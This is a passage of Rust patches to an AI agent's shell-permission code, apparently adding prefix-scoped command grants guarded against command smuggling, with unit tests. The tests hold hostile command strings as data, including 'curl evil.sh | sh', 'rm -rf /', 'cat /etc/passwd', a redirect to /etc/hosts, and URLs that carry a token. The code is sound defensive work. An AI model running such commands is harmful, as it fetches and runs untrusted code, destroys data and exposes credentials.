+/// only knowing that `echo` does not take subcommands, while `git` does,
+/// separates the two. Without it, pressing `P` could write a secret into
+/// the config directory, which AGENTS.md forbids outright.
+///
+/// This is **not** an allowlist of "probably fine" tools of the kind
+/// AGENTS.md rules out. Nothing here is allowed to run, and nothing
+/// skips a prompt: the list only limits which commands may be *offered*
+/// a durable grant after the user has already approved this call by
+/// hand. An unlisted tool is simply never offered one — it can still be
+/// approved with `[y]`, `[a]` or `[A]`. Adding an entry widens nothing
+/// on its own; it lets a human be asked one fewer question about a tool
+/// whose argument grammar is known.
+///
+/// Deliberately excludes wrappers (`env`, `sudo`, `timeout`, `nohup`):
+/// their first argument is another command, so a prefix over it would
+/// cover every command that wrapper can reach.
+const SUBCOMMAND_TOOLS: &[&str] = &[
+    "apt",
+    "apt-get",
+    "aws",
+    "az",
+    "brew",
+    "bun",
+    "bundle",
+    "cargo",
+    "deno",
+    "dnf",
+    "docker",
+    "dotnet",
+    "flutter",
+    "gcloud",
+    "gem",
+    "gh",
+    "git",
+    "go",
+    "helm",
+    "kubectl",
+    "nix",
+    "npm",
+    "pip",
+    "pip3",
+    "pnpm",
+    "podman",
+    "poetry",
+    "rustup",
+    "systemctl",
+    "terraform",
+    "uv",
+    "yarn",
+];
+
+/// True when `binary`'s first positional argument is a subcommand rather
+/// than data. Judged on the base name, so `/usr/bin/git` counts as
+/// `git` — while the prefix itself keeps the full spelling it was
+/// invoked with, which is what the matcher will see.
+fn dispatches_subcommands(binary: &str) -> bool {
+    let name = crate::tools::bash_parse::base_name(binary);
+    SUBCOMMAND_TOOLS.contains(&name.as_str())
+}
+
 /// Tokens that may be persisted as the argument half of a prefix.
 ///
 /// A subcommand is a short identifier the tool itself defines — `status`,
@@ -1319,6 +1450,9 @@ fn prefix_covers(prefix: &str, command: &str) -> bool {
 ///
 /// * Commands the gate cannot reason about — multiple invocations,
 ///   substitutions, subshells, redirection, assignment.
+/// * A binary that does not take subcommands at all
+///   ([`SUBCOMMAND_TOOLS`]), including every command wrapper: `env git
+///   status` would otherwise offer `env git`, covering `env git push`.
 /// * A first non-flag argument that is data rather than a subcommand
 ///   ([`is_subcommand_token`]): `curl https://token@host` must not put a
 ///   credential in the config directory.
@@ -1343,6 +1477,16 @@ pub fn derive_prefix(command: &str) -> Option<String> {
     if parsed.command_texts.len() != 1 {
         return None;
     }
+    // A wrapper's name says nothing about what actually executes, so the
+    // token after it is a command, not a subcommand: `env git status`
+    // would offer `env git`, and that covers `env git push --force`.
+    // `SUBCOMMAND_TOOLS` already excludes the wrapper names; this also
+    // catches a wrapped invocation of a listed tool.
+    if crate::tools::bash_parse::has_dynamic_wrapper(&parsed)
+        || !crate::tools::bash_parse::unwrapped_invocation_texts(&parsed).is_empty()
+    {
+        return None;
+    }
     let invocation = parsed.invocations.first()?;
     let mut tokens = invocation
         .iter()
@@ -1355,6 +1499,11 @@ pub fn derive_prefix(command: &str) -> Option<String> {
     // additionally hid the separators that mark an argument as data.
     let binary = tokens.next()?;
     if !is_literal_binary_token(&binary) {
+        return None;
+    }
+    // The one question a character-shape test cannot answer: is the next
+    // token a subcommand, or is it data?
+    if !dispatches_subcommands(&binary) {
         return None;
     }
     // Both halves are required: see the bare-binary note above.

--- a/crates/lib/src/permissions/grants.rs
+++ b/crates/lib/src/permissions/grants.rs
@@ -4,14 +4,15 @@
 //! call, so the same call stops prompting on later runs. Three properties
 //! keep that from becoming a way to smuggle work past the user.
 //!
-//! **Exact match, never prefix.** A grant is keyed by
+//! **Exact match by default.** A grant is keyed by
 //! [`crate::tools::executor::persistent_grant_key`] — the full normalized
 //! operation, stricter than the session-scoped key — and matched by
 //! equality. A grant for `git status` therefore does not cover
 //! `git status && rm -rf /`, and a grant for one write payload does not
-//! cover a different payload to the same path. Prefix-scoped grants are
-//! a separate, more dangerous feature and are deliberately not
-//! implemented here.
+//! cover a different payload to the same path. Prefix-scoped grants
+//! (see [`PrefixEntry`] at the bottom of this file) are the one
+//! exception, and are matched by parsing rather than by string prefix so
+//! that `git status && rm -rf /` is not covered by them either.
 //!
 //! **Only reachable from `Ask`.** The executor consults grants inside the
 //! `Ask` arm, after rules and the default mode have already run, so a
@@ -70,6 +71,11 @@ pub struct GrantStore {
     /// only, and held apart from `keys` so a refresh cannot mistake them
     /// for on-disk state.
     session_fallback: HashMap<String, String>,
+    /// The same fallback for prefix grants: an approval the disk refused
+    /// still has to hold for this process, or the user answers "always"
+    /// and is asked again on the very next call. Held apart from
+    /// `prefixes` because [`Self::refresh`] overwrites that from disk.
+    prefix_fallback: Vec<PrefixEntry>,
 }
 
 impl GrantStore {
@@ -88,6 +94,7 @@ impl GrantStore {
             keys: HashSet::new(),
             prefixes: Vec::new(),
             session_fallback: HashMap::new(),
+            prefix_fallback: Vec::new(),
             labels: Vec::new(),
         };
         let Some(ref p) = store.path else {
@@ -103,6 +110,11 @@ impl GrantStore {
             store.keys.insert(entry.key.clone());
             store.labels.push((entry.key, entry.label));
         }
+        // Prefix grants load here too, not only on the first `refresh`:
+        // a caller that loads and immediately summarizes (`/permissions`)
+        // would otherwise report "none" while prefixes on disk are
+        // suppressing prompts.
+        store.prefixes = parsed.prefixes;
         store
     }
 
@@ -114,6 +126,7 @@ impl GrantStore {
             keys: HashSet::new(),
             prefixes: Vec::new(),
             session_fallback: HashMap::new(),
+            prefix_fallback: Vec::new(),
             labels: Vec::new(),
         }
     }
@@ -143,18 +156,26 @@ impl GrantStore {
         self.labels = disk.grants.into_iter().map(|g| (g.key, g.label)).collect();
     }
 
-    /// True when nothing is in force — on disk *or* in the session-only
-    /// fallback. A fallback grant still suppresses prompts, so reporting
-    /// "none" while one is active would hide an effective approval.
+    /// True when nothing is in force — exact or prefix, on disk *or* in
+    /// the session-only fallbacks. Every one of those four suppresses
+    /// prompts, so reporting "none" while one is active would hide an
+    /// effective approval. A project holding only prefix grants is the
+    /// case that made this worth spelling out.
     pub fn is_empty(&self) -> bool {
-        self.keys.is_empty() && self.session_fallback.is_empty()
+        self.keys.is_empty()
+            && self.session_fallback.is_empty()
+            && self.prefixes.is_empty()
+            && self.prefix_fallback.is_empty()
     }
 
-    /// How many grants are in force, counting the session-only fallback.
-    /// [`Self::clear`] revokes both, so this is also the number a clear
-    /// forgets.
+    /// How many grants are in force, counting prefix grants and the
+    /// session-only fallbacks. [`Self::clear`] revokes all of them, so
+    /// this is also the number a clear forgets.
     pub fn len(&self) -> usize {
-        self.keys.len() + self.session_fallback.len()
+        self.keys.len()
+            + self.session_fallback.len()
+            + self.prefixes.len()
+            + self.prefix_fallback.len()
     }
 
     /// Record a grant and persist it. Returns whether anything was
@@ -223,6 +244,7 @@ impl GrantStore {
         // Session-only fallback grants are revoked too — `clear` means
         // every recorded approval, wherever it lives.
         self.session_fallback.clear();
+        self.prefix_fallback.clear();
         let Some(path) = self.path.clone() else {
             return Ok(());
         };
@@ -241,21 +263,31 @@ impl GrantStore {
 
     /// Human-readable labels, for a "what have I approved" listing.
     ///
-    /// Session-only fallback grants are listed too, marked as such: they
-    /// suppress prompts exactly like the persisted ones, so omitting them
-    /// would leave an active approval invisible to the user it is meant
-    /// to inform. The marker keeps the two distinguishable — a fallback
-    /// grant disappears when the process exits, a persisted one does not.
-    /// Ordered: disk order first, then fallback grants sorted, so
-    /// repeated listings do not shuffle.
+    /// Covers all four kinds of grant in force: exact and prefix, on disk
+    /// and in the session-only fallbacks. Fallbacks are marked as such:
+    /// they suppress prompts exactly like the persisted ones, so omitting
+    /// them would leave an active approval invisible to the user it is
+    /// meant to inform. The marker keeps the two distinguishable — a
+    /// fallback grant disappears when the process exits, a persisted one
+    /// does not. Ordered: disk order first (exact, then prefix), then
+    /// fallback grants sorted, so repeated listings do not shuffle.
     pub fn labels(&self) -> impl Iterator<Item = String> {
         let mut fallback: Vec<String> = self
             .session_fallback
             .values()
             .map(|l| format!("{l} [session only — could not be saved to disk]"))
+            .chain(
+                self.prefix_fallback
+                    .iter()
+                    .map(|e| format!("{} [session only — could not be saved to disk]", e.label())),
+            )
             .collect();
         fallback.sort();
-        self.labels.iter().map(|(_, l)| l.clone()).chain(fallback)
+        self.labels
+            .iter()
+            .map(|(_, l)| l.clone())
+            .chain(self.prefix_labels().collect::<Vec<_>>())
+            .chain(fallback)
     }
 
     /// Write `file` to `path`. Caller must hold the grant-file lock.
@@ -443,6 +475,185 @@ mod tests {
                 "proposed a prefix for an unanalysable command: {cmd}"
             );
         }
+    }
+
+    /// A positional argument is data, not a subcommand. Persisting it
+    /// would write arbitrary command-line content — here a credential —
+    /// into the config directory, which nothing in the permission system
+    /// is allowed to do.
+    #[test]
+    fn derive_prefix_never_persists_a_positional_argument() {
+        for cmd in [
+            "curl https://token@example.com/path",
+            "curl https://token@example.com",
+            "cat /etc/passwd",
+            "cat secrets.env",
+            "psql postgres://user:pw@db/app",
+            "ssh deploy@10.0.0.1",
+            "ls /usr/bin",
+            "aws s3://bucket/key",
+        ] {
+            let got = derive_prefix(cmd);
+            assert_eq!(
+                got, None,
+                "offered a prefix carrying a positional argument for {cmd}: {got:?}"
+            );
+        }
+    }
+
+    /// Failing closed must not become failing open: refusing to describe
+    /// `curl <url>` as `curl <url>` may never be resolved by offering the
+    /// bare binary, which would approve every future use of that tool.
+    #[test]
+    fn derive_prefix_does_not_widen_to_the_bare_binary() {
+        assert_eq!(derive_prefix("curl https://example.com/a"), None);
+        // The same binary with a real subcommand still works, and a
+        // later credential-bearing call is not covered by it.
+        assert_eq!(derive_prefix("gh pr list").as_deref(), Some("gh pr"));
+        let mut store = GrantStore::ephemeral();
+        store.insert_prefix("gh pr", "ctx", "").unwrap();
+        assert!(!store.allows_prefix("gh auth token", "ctx"));
+    }
+
+    /// Control and bidi characters must never reach the stored prefix:
+    /// the persisted bytes have to be the ones the user was shown.
+    #[test]
+    fn derive_prefix_refuses_deceptive_characters() {
+        for cmd in [
+            "gi\u{202e}t status",
+            "\u{202e}git status",
+            "git \u{202e}status",
+            "git sta\u{200b}tus",
+        ] {
+            assert_eq!(
+                derive_prefix(cmd),
+                None,
+                "a deceptive character reached the offered prefix: {cmd:?}"
+            );
+        }
+    }
+
+    /// An offered prefix has to authorize the very command it was offered
+    /// for; a prefix that cannot match its own command is a grant that
+    /// silently does nothing.
+    #[test]
+    fn an_offered_prefix_covers_the_command_it_came_from() {
+        for cmd in ["git status --porcelain", "cargo build --release", "ls -la"] {
+            let prefix = derive_prefix(cmd).unwrap_or_else(|| panic!("no prefix for {cmd}"));
+            let mut store = GrantStore::ephemeral();
+            store.insert_prefix(&prefix, "ctx", "").unwrap();
+            assert!(
+                store.allows_prefix(cmd, "ctx"),
+                "prefix `{prefix}` did not cover its own command {cmd}"
+            );
+        }
+    }
+
+    /// A project holding only prefix grants is still a project with
+    /// approvals in force. Reporting "none" would leave them invisible
+    /// and therefore unrevokable, and the clear count would be wrong.
+    #[test]
+    fn prefix_grants_appear_in_the_summary() {
+        let _s = Sandbox::new();
+        let project = tempfile::tempdir().unwrap();
+
+        let mut store = GrantStore::load(project.path());
+        store
+            .insert_prefix("git status", "ctx", "commands starting with `git status`")
+            .unwrap();
+        assert!(!store.is_empty(), "a prefix grant was reported as no grant");
+        assert_eq!(store.len(), 1);
+        assert_eq!(
+            store.labels().collect::<Vec<_>>(),
+            vec!["commands starting with `git status`".to_string()]
+        );
+
+        // A freshly loaded store summarizes the same way, before any
+        // `allows_prefix` call has refreshed it.
+        let reloaded = GrantStore::load(project.path());
+        assert!(!reloaded.is_empty());
+        assert_eq!(reloaded.len(), 1);
+        assert_eq!(reloaded.labels().count(), 1);
+
+        // Mixed grants: both kinds counted and listed.
+        let mut store = GrantStore::load(project.path());
+        store.insert("Bash\0exact", "Bash: exact").unwrap();
+        store.refresh();
+        assert_eq!(
+            store.len(),
+            2,
+            "the prefix grant was dropped from the count"
+        );
+        let labels: Vec<String> = store.labels().collect();
+        assert_eq!(
+            labels,
+            vec![
+                "Bash: exact".to_string(),
+                "commands starting with `git status`".to_string(),
+            ]
+        );
+    }
+
+    /// An unlabelled prefix grant still has to describe itself in the
+    /// listing, or an active approval shows as a blank line.
+    #[test]
+    fn an_unlabelled_prefix_grant_describes_itself() {
+        let mut store = GrantStore::ephemeral();
+        store.insert_prefix("cargo build", "ctx", "").unwrap();
+        assert_eq!(
+            store.labels().collect::<Vec<_>>(),
+            vec!["commands starting with `cargo build`".to_string()]
+        );
+    }
+
+    /// The user answered "always"; a config directory that cannot be
+    /// written must not quietly downgrade that to "ask me again", which
+    /// is what a refresh-from-disk did to the in-memory copy.
+    #[test]
+    fn a_prefix_grant_falls_back_to_the_session_when_the_write_fails() {
+        let _s = Sandbox::new();
+        let project = tempfile::tempdir().unwrap();
+
+        // Occupy the grants directory's path with a regular file so
+        // every write fails.
+        let path = grant_file_path(project.path()).unwrap();
+        let grants_dir = path.parent().unwrap();
+        std::fs::create_dir_all(grants_dir.parent().unwrap()).unwrap();
+        std::fs::write(grants_dir, b"not a directory").unwrap();
+
+        let mut store = GrantStore::load(project.path());
+        assert!(
+            store.insert_prefix("git status", "ctx", "").is_err(),
+            "precondition: the write must fail"
+        );
+
+        // The grant holds for this process, across the refresh that
+        // `allows_prefix` performs.
+        assert!(
+            store.allows_prefix("git status --porcelain", "ctx"),
+            "an approved prefix stopped applying as soon as the write failed"
+        );
+        assert!(
+            !store.allows_prefix("git push", "ctx"),
+            "the fallback widened beyond the approved prefix"
+        );
+
+        // Visible and counted, marked as unsaved.
+        assert!(!store.is_empty());
+        assert_eq!(store.len(), 1);
+        let labels: Vec<String> = store.labels().collect();
+        assert_eq!(labels.len(), 1);
+        assert!(
+            labels[0].contains("session only"),
+            "an unsaved grant was listed as if it were saved: {}",
+            labels[0]
+        );
+
+        // A repeat answer is still a no-op, and `clear` revokes it.
+        assert!(!store.insert_prefix("git status", "ctx", "").unwrap());
+        let _ = store.clear();
+        assert!(!store.allows_prefix("git status", "ctx"));
+        assert!(store.is_empty());
     }
 
     #[test]
@@ -914,6 +1125,62 @@ pub struct PrefixEntry {
     pub label: String,
 }
 
+impl PrefixEntry {
+    /// What `/permissions` shows for this grant. Entries written without
+    /// a label still have to describe themselves, or the listing shows a
+    /// blank line where an active approval should be.
+    fn label(&self) -> String {
+        if self.label.is_empty() {
+            format!("commands starting with `{}`", self.prefix)
+        } else {
+            self.label.clone()
+        }
+    }
+}
+
+/// Tokens that may be persisted as the argument half of a prefix.
+///
+/// A subcommand is a short identifier the tool itself defines — `status`,
+/// `build`, `rev-parse`. Anything else in that position is *data*: a URL,
+/// a path, a filename, a `key=value`. Persisting data would write
+/// arbitrary command-line content — including a credential-bearing URL
+/// like `https://token@example.com` — into the config directory, which
+/// AGENTS.md forbids outright, and would also record a prefix so specific
+/// it could never match twice.
+///
+/// Deliberately narrow: alphanumerics, `-` and `_` only. That excludes
+/// `/`, `.`, `:`, `@`, `=`, `~`, `%`, every quote and every non-ASCII
+/// character, so no separator, control or bidi character can ride into
+/// the stored prefix. Unrecognized shapes fail closed — see
+/// [`derive_prefix`].
+fn is_subcommand_token(tok: &str) -> bool {
+    !tok.is_empty()
+        && tok.len() <= 32
+        && tok.starts_with(|c: char| c.is_ascii_alphanumeric())
+        && tok
+            .chars()
+            .all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_')
+}
+
+/// True when `tok` is safe to persist and to render as an executable
+/// name. Binaries legitimately carry `.`, `/` and `~` (`./deploy.sh`), so
+/// they cannot be held to [`is_subcommand_token`]; what they must not
+/// carry is anything that makes the stored bytes differ from the painted
+/// ones — control characters, bidi overrides, zero-width joiners.
+fn is_displayable_binary(tok: &str) -> bool {
+    !tok.is_empty()
+        && !tok.chars().any(|c| {
+            c.is_control()
+                || c.is_whitespace()
+                || matches!(c,
+                    '\u{200B}'..='\u{200F}'
+                    | '\u{202A}'..='\u{202E}'
+                    | '\u{2060}'..='\u{2064}'
+                    | '\u{2066}'..='\u{2069}'
+                    | '\u{FEFF}')
+        })
+}
+
 /// Propose the prefix to offer for `command`: the binary plus its first
 /// non-flag argument.
 ///
@@ -925,6 +1192,12 @@ pub struct PrefixEntry {
 /// Returns `None` when the command is anything the gate cannot reason
 /// about — multiple invocations, substitutions, redirection — because a
 /// prefix over an unanalysable command is not a prefix over anything.
+///
+/// Also returns `None` when that first non-flag argument is data rather
+/// than a subcommand ([`is_subcommand_token`]). `curl https://token@host`
+/// must not put a credential in the config directory, and widening to the
+/// bare binary instead — "never ask about `curl` again" — would be worse
+/// than asking. Nothing is offered; `[y]`/`[a]`/`[A]` still are.
 pub fn derive_prefix(command: &str) -> Option<String> {
     let parsed = crate::tools::bash_parse::parse_bash(command)?;
     if parsed.has_parse_error
@@ -944,14 +1217,24 @@ pub fn derive_prefix(command: &str) -> Option<String> {
     let invocation = parsed.invocations.first()?;
     let mut tokens = invocation
         .iter()
-        .map(|t| crate::tools::bash_parse::base_name(&crate::tools::bash_parse::unquote_token(t)));
-    let binary = tokens.next()?;
-    if binary.is_empty() {
+        .map(|t| crate::tools::bash_parse::unquote_token(t));
+    // Only the binary is reduced to its base name: `/usr/bin/git` and
+    // `git` are the same tool. Arguments keep their full text, because
+    // base-naming them would both mangle the prefix past matching
+    // (`ls /usr/bin` → `ls bin`, which matches neither) and hide the
+    // separators that mark an argument as data.
+    let binary = crate::tools::bash_parse::base_name(&tokens.next()?);
+    if !is_displayable_binary(&binary) {
         return None;
     }
     match tokens.find(|t| !t.starts_with('-')) {
-        Some(sub) if !sub.is_empty() => Some(format!("{binary} {sub}")),
-        _ => Some(binary),
+        Some(sub) if is_subcommand_token(&sub) => Some(format!("{binary} {sub}")),
+        // A positional argument that is not a subcommand is data. Fail
+        // closed rather than persist it or widen to the bare binary.
+        Some(_) => None,
+        // No positional argument at all: the binary is the whole command,
+        // so a prefix over it grants no more than the call being approved.
+        None => Some(binary),
     }
 }
 
@@ -966,7 +1249,12 @@ impl GrantStore {
     /// `git status && rm -rf /`.
     pub fn allows_prefix(&mut self, command: &str, context: &str) -> bool {
         self.refresh();
-        self.prefixes.iter().any(|e| {
+        // The session-only fallback is consulted alongside the on-disk
+        // view, exactly as `contains` does for exact grants: `refresh`
+        // has just overwritten `prefixes` from disk, so a grant the disk
+        // refused would otherwise evaporate one call after the user gave
+        // it.
+        self.prefixes.iter().chain(&self.prefix_fallback).any(|e| {
             if e.context != context {
                 return false;
             }
@@ -988,6 +1276,13 @@ impl GrantStore {
     }
 
     /// Record a prefix grant. Returns whether anything new was written.
+    ///
+    /// On a write failure the error is reported but the grant is kept in
+    /// a session-only fallback, exactly as [`Self::insert`] does for
+    /// exact grants: the user said "always", and a read-only config
+    /// directory must not silently turn that into "ask me again on the
+    /// next call". It stays revocable — [`Self::clear`] drops it — and
+    /// visible, since [`Self::labels`] marks it as unsaved.
     pub fn insert_prefix(
         &mut self,
         prefix: &str,
@@ -997,6 +1292,7 @@ impl GrantStore {
         if self
             .prefixes
             .iter()
+            .chain(&self.prefix_fallback)
             .any(|e| e.prefix == prefix && e.context == context)
         {
             return Ok(false);
@@ -1010,11 +1306,21 @@ impl GrantStore {
             self.prefixes.push(entry);
             return Ok(true);
         };
+        match self.insert_prefix_durable(&path, entry.clone()) {
+            Ok(()) => Ok(true),
+            Err(e) => {
+                self.prefix_fallback.push(entry);
+                Err(e)
+            }
+        }
+    }
+
+    fn insert_prefix_durable(&mut self, path: &Path, entry: PrefixEntry) -> Result<(), String> {
         // Same lock-read-merge-write as `insert`: persisting this
         // store's snapshot would resurrect grants another session
         // cleared after we loaded.
-        let _lock = lock_grant_file(&path)?;
-        let mut disk = read_grant_file(&path);
+        let _lock = lock_grant_file(path)?;
+        let mut disk = read_grant_file(path);
         if !disk
             .prefixes
             .iter()
@@ -1023,18 +1329,13 @@ impl GrantStore {
             disk.prefixes.push(entry);
         }
         self.prefixes = disk.prefixes.clone();
-        self.write_locked(&path, &disk)?;
-        Ok(true)
+        self.write_locked(path, &disk)
     }
 
-    /// Prefix grants recorded for this project.
+    /// Prefix grants recorded for this project, as display labels.
+    /// Folded into [`Self::labels`] so the `/permissions` listing shows
+    /// them without every caller having to remember two accessors.
     pub fn prefix_labels(&self) -> impl Iterator<Item = String> + '_ {
-        self.prefixes.iter().map(|e| {
-            if e.label.is_empty() {
-                format!("commands starting with `{}`", e.prefix)
-            } else {
-                e.label.clone()
-            }
-        })
+        self.prefixes.iter().map(PrefixEntry::label)
     }
 }

--- a/crates/lib/src/permissions/grants.rs
+++ b/crates/lib/src/permissions/grants.rs
@@ -41,6 +41,10 @@ use serde::{Deserialize, Serialize};
 struct GrantFile {
     #[serde(default)]
     grants: Vec<GrantEntry>,
+    /// Absent in files written before prefix grants existed, so an older
+    /// grant file still loads.
+    #[serde(default)]
+    prefixes: Vec<PrefixEntry>,
 }
 
 #[derive(Debug, Clone, Serialize, Deserialize)]
@@ -57,6 +61,9 @@ struct GrantEntry {
 pub struct GrantStore {
     path: Option<PathBuf>,
     keys: HashSet<String>,
+    /// Prefix-scoped grants (D9-07), kept apart from the digest keys
+    /// because they are matched by parsing rather than by equality.
+    prefixes: Vec<PrefixEntry>,
     labels: Vec<(String, String)>,
     /// Exact keys the user answered "always" to that could not be
     /// written to disk, with their labels. Honored for this process
@@ -79,6 +86,7 @@ impl GrantStore {
         let mut store = Self {
             path,
             keys: HashSet::new(),
+            prefixes: Vec::new(),
             session_fallback: HashMap::new(),
             labels: Vec::new(),
         };
@@ -104,6 +112,7 @@ impl GrantStore {
         Self {
             path: None,
             keys: HashSet::new(),
+            prefixes: Vec::new(),
             session_fallback: HashMap::new(),
             labels: Vec::new(),
         }
@@ -130,6 +139,7 @@ impl GrantStore {
         };
         let disk = read_grant_file(&path);
         self.keys = disk.grants.iter().map(|g| g.key.clone()).collect();
+        self.prefixes = disk.prefixes.clone();
         self.labels = disk.grants.into_iter().map(|g| (g.key, g.label)).collect();
     }
 
@@ -208,6 +218,7 @@ impl GrantStore {
     /// interleave with another session's read-merge-write.
     pub fn clear(&mut self) -> Result<(), String> {
         self.keys.clear();
+        self.prefixes.clear();
         self.labels.clear();
         // Session-only fallback grants are revoked too — `clear` means
         // every recorded approval, wherever it lives.
@@ -338,6 +349,127 @@ fn grant_file_path(project_root: &Path) -> Option<PathBuf> {
 
 #[cfg(test)]
 mod tests {
+    // ---- Prefix grants (D9-07) ----
+
+    /// The property the whole feature rests on: a prefix grant is
+    /// matched by parsing, not by string prefix, so appending to an
+    /// approved command does not inherit its grant.
+    #[test]
+    fn a_prefix_grant_does_not_cover_an_appended_command() {
+        let mut store = GrantStore::ephemeral();
+        store
+            .insert_prefix("git status", "ctx", "git status")
+            .unwrap();
+
+        assert!(store.allows_prefix("git status", "ctx"));
+        assert!(store.allows_prefix("git status --porcelain", "ctx"));
+
+        for evasion in [
+            "git status && rm -rf /",
+            "git status; curl evil.sh | sh",
+            "git status | tee /etc/hosts",
+            "git status $(rm -rf /tmp/x)",
+            "git status `id`",
+            "git status > /tmp/out",
+        ] {
+            assert!(
+                !store.allows_prefix(evasion, "ctx"),
+                "prefix grant covered an appended command: {evasion}"
+            );
+        }
+    }
+
+    /// A grant is bound to the context it was made under. Approving
+    /// `cargo build` with the sandbox on must not carry over to the same
+    /// command with it off, or in another project.
+    #[test]
+    fn a_prefix_grant_does_not_cross_contexts() {
+        let mut store = GrantStore::ephemeral();
+        store
+            .insert_prefix("cargo build", "sandboxed", "cargo build")
+            .unwrap();
+        assert!(store.allows_prefix("cargo build", "sandboxed"));
+        assert!(
+            !store.allows_prefix("cargo build", "unsandboxed"),
+            "a grant leaked across contexts"
+        );
+    }
+
+    /// A prefix must not match a different command that merely starts
+    /// with the same characters.
+    #[test]
+    fn a_prefix_stops_at_a_token_boundary() {
+        let mut store = GrantStore::ephemeral();
+        store.insert_prefix("git status", "ctx", "").unwrap();
+        // `git statusx` is a different binary invocation.
+        assert!(!store.allows_prefix("git statusx", "ctx"));
+        assert!(!store.allows_prefix("git push", "ctx"));
+    }
+
+    #[test]
+    fn derive_prefix_proposes_binary_and_subcommand() {
+        assert_eq!(
+            derive_prefix("git status --porcelain").as_deref(),
+            Some("git status")
+        );
+        assert_eq!(
+            derive_prefix("cargo build --release").as_deref(),
+            Some("cargo build")
+        );
+        // No subcommand: the binary alone.
+        assert_eq!(derive_prefix("ls -la").as_deref(), Some("ls"));
+        // Path-qualified binaries reduce to their name.
+        assert_eq!(
+            derive_prefix("/usr/bin/git status").as_deref(),
+            Some("git status")
+        );
+    }
+
+    /// Never propose a prefix for something the gate cannot reason
+    /// about — a prefix over an unanalysable command is not a prefix
+    /// over anything.
+    #[test]
+    fn derive_prefix_refuses_unanalysable_commands() {
+        for cmd in [
+            "git status && rm -rf /",
+            "git status | tee x",
+            "echo $(whoami)",
+            "ls > out",
+            "(ls)",
+            "PATH=/tmp ls",
+        ] {
+            assert!(
+                derive_prefix(cmd).is_none(),
+                "proposed a prefix for an unanalysable command: {cmd}"
+            );
+        }
+    }
+
+    #[test]
+    fn clearing_revokes_prefix_grants_too() {
+        let _s = Sandbox::new();
+        let project = tempfile::tempdir().unwrap();
+        let mut store = GrantStore::load(project.path());
+        store.insert_prefix("git status", "ctx", "").unwrap();
+        assert!(store.allows_prefix("git status", "ctx"));
+        store.clear().unwrap();
+        assert!(
+            !store.allows_prefix("git status", "ctx"),
+            "clear left a prefix grant in force"
+        );
+        assert!(!GrantStore::load(project.path()).allows_prefix("git status", "ctx"));
+    }
+
+    #[test]
+    fn a_prefix_grant_survives_a_reload() {
+        let _s = Sandbox::new();
+        let project = tempfile::tempdir().unwrap();
+        GrantStore::load(project.path())
+            .insert_prefix("cargo test", "ctx", "cargo test")
+            .unwrap();
+        assert!(GrantStore::load(project.path()).allows_prefix("cargo test --lib", "ctx"));
+    }
+
     use super::*;
 
     /// `XDG_CONFIG_HOME` redirects `agent_config_dir`, giving each test a
@@ -756,5 +888,153 @@ mod tests {
             grant_file_path(&b).unwrap(),
             "two different projects were assigned the same grant file"
         );
+    }
+}
+
+// ---- Prefix-scoped grants (D9-07) ----
+
+/// A grant covering every command that starts with `prefix`.
+///
+/// Stored in plaintext, unlike the digest-keyed exact grants, because
+/// matching a prefix requires the prefix itself. That is acceptable
+/// precisely because a prefix is user-chosen and short — `git status`,
+/// `cargo build` — rather than a whole command line that might carry a
+/// token. `derive_prefix` is what keeps it that way.
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct PrefixEntry {
+    /// The approved command prefix.
+    pub prefix: String,
+    /// Digest of the non-command context the grant was made under —
+    /// sandbox state, background flag, timeout, cwd. A prefix approved
+    /// in one project or with the sandbox off must not silently apply
+    /// elsewhere.
+    pub context: String,
+    /// Human-readable reminder, for the audit listing.
+    #[serde(default)]
+    pub label: String,
+}
+
+/// Propose the prefix to offer for `command`: the binary plus its first
+/// non-flag argument.
+///
+/// `git status --porcelain` proposes `git status`, not `git`. Offering
+/// the bare binary would turn "don't ask about `git status` again" into
+/// "never ask about git again", including `git push --force`. Offering
+/// the whole line would never match twice.
+///
+/// Returns `None` when the command is anything the gate cannot reason
+/// about — multiple invocations, substitutions, redirection — because a
+/// prefix over an unanalysable command is not a prefix over anything.
+pub fn derive_prefix(command: &str) -> Option<String> {
+    let parsed = crate::tools::bash_parse::parse_bash(command)?;
+    if parsed.has_parse_error
+        || !parsed.substitutions.is_empty()
+        || parsed.has_subshell
+        || parsed.has_process_substitution
+        || !parsed.redirections.is_empty()
+        || !parsed.assignments.is_empty()
+    {
+        return None;
+    }
+    // More than one invocation: there is no single prefix that describes
+    // the command, and picking the first would grant the rest.
+    if parsed.command_texts.len() != 1 {
+        return None;
+    }
+    let invocation = parsed.invocations.first()?;
+    let mut tokens = invocation
+        .iter()
+        .map(|t| crate::tools::bash_parse::base_name(&crate::tools::bash_parse::unquote_token(t)));
+    let binary = tokens.next()?;
+    if binary.is_empty() {
+        return None;
+    }
+    match tokens.find(|t| !t.starts_with('-')) {
+        Some(sub) if !sub.is_empty() => Some(format!("{binary} {sub}")),
+        _ => Some(binary),
+    }
+}
+
+impl GrantStore {
+    /// True when a prefix grant covers `command` under `context`.
+    ///
+    /// Matching goes through the same asymmetric per-invocation matcher
+    /// the permission rules use, in its *widening* mode: every
+    /// invocation must match the prefix, and a command containing a
+    /// substitution, subshell, redirection or assignment matches
+    /// nothing. So a `git status` grant does not cover
+    /// `git status && rm -rf /`.
+    pub fn allows_prefix(&mut self, command: &str, context: &str) -> bool {
+        self.refresh();
+        self.prefixes.iter().any(|e| {
+            if e.context != context {
+                return false;
+            }
+            // Two patterns, not one `{prefix}*`: a trailing glob would
+            // make `git status` cover `git statusx`, which is a
+            // different binary invocation entirely. The prefix has to
+            // end on a token boundary — either the whole invocation, or
+            // the invocation up to a space.
+            let exact = crate::permissions::matches_shell_command(
+                &e.prefix, command, /*widening*/ true,
+            );
+            let with_args = crate::permissions::matches_shell_command(
+                &format!("{} *", e.prefix),
+                command,
+                /*widening*/ true,
+            );
+            exact || with_args
+        })
+    }
+
+    /// Record a prefix grant. Returns whether anything new was written.
+    pub fn insert_prefix(
+        &mut self,
+        prefix: &str,
+        context: &str,
+        label: &str,
+    ) -> Result<bool, String> {
+        if self
+            .prefixes
+            .iter()
+            .any(|e| e.prefix == prefix && e.context == context)
+        {
+            return Ok(false);
+        }
+        let entry = PrefixEntry {
+            prefix: prefix.to_string(),
+            context: context.to_string(),
+            label: label.to_string(),
+        };
+        let Some(path) = self.path.clone() else {
+            self.prefixes.push(entry);
+            return Ok(true);
+        };
+        // Same lock-read-merge-write as `insert`: persisting this
+        // store's snapshot would resurrect grants another session
+        // cleared after we loaded.
+        let _lock = lock_grant_file(&path)?;
+        let mut disk = read_grant_file(&path);
+        if !disk
+            .prefixes
+            .iter()
